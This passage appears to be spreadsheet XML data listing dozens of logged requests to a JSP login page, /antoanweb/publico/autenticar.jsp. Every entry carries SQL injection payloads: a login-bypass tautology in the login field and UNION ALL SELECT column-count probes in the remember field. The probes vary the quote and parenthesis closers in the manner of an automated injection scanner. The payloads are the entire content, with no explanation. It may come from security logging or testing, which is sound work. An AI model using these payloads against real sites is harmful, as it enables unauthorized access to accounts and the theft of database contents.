    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113,5113#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613,3613#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668,668#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266,9266#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242,242#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438,6438#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000,8000#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799,2799#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951,951#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040,2040#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906,906#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915,1915#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966,9966#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974,974#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919,5919#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708,5708#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887,5887#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348,8348#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521,8521#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536,5536#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534,534#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266,6266#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635,5635#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888,3888#and(7631=7631&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780,4780#and(6346=6346&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283,6283#and(3872=3872&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260,7260#and(4183=4183&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830#and(6001=6001&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213,2213#and(296=296&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283,283#and(8823=8823&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748#and(9094=9094&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687#and(3585=3585&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608,5608#and(9217=9217&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587,1587#and((1170=1170&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376#and((4024=4024&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854,854#and((8445=8445&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644,3644#and((5535=5535&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351,5351#and((8174=8174&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439,5439#and((4759=4759&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833,3833#and((8503=8503&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453#and((5021=5021&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409,8409#and((7393=7393&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048,8048#and((2501=2501&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564,8564#and(((619=619&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246,9246#and(((2450=2450&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217#and(((3692=3692&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433,1433#and(((4072=4072&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756,3756#and(((1124=1124&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158#and(((7060=7060&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151,1151#and(((1517=1517&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985,985#and(((1507=1507&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065#and(((6272=6272&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522,3522#and(((1806=1806&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698,4698#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279,8279#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376,5376#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298,298#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061,2061#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104,5104#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643,643#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643#and('rcfg'='rcfg&amp;modo=entrar</t>
  </si>
  <si>
